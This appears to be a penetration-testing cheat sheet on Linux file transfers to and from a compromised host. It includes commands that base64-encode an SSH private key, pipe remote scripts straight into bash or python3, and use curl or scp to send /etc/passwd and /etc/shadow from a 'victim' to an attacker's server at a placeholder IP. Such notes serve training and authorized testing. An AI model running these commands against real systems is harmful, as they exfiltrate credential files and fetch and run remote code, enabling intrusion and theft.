File transfers (Linux)
Table of Contents
Downloads#
base64#
# encode
cat id_rsa | base64 -w 0; echo
LS0t...LQo=
# decode
echo -n 'LS0t...LQo=' | base64 -d > id_rsa
💡 Remember to check the
md5sums
wget/curl#
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
fileless#
Use pipes 🪈
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
wget -qO- https://.../helloworld.py | python3
/dev/tcp#
As long as bash@2.04 or greater is installed (and compiled with --enable-net-redirections flag) we can use /dev/tcp device for downloads:
# connect to the web server
exec 3<>/dev/tcp/<IP>/<PORT>
# GET request
echo -e "GET /LinEnum.sh HTTP/1/1\n\n">&3
# print the response
cat <&3
scp#
scp <user>@<IP>:</path>
Uploads#
Web Uploads#
We can upload files to e.g. uploadserver using e.g. curl:
# victim
curl -X POST https://<IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure # or -I
Downloading from the target using built-in web servers#
We can use one of the following:
python3 -m http.server
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000
and wget/curl the files from our attack box.
⚠️ When we start the web server with Python/PHP, remember that inbound traffic may be blocked. We are transferring a file from our target onto our attack host, but we are not uploading the file.
scp#
scp /etc/passwd kali@<IP>:/home/kali/
Unzip#
gunzip -S .zip <filename.zip>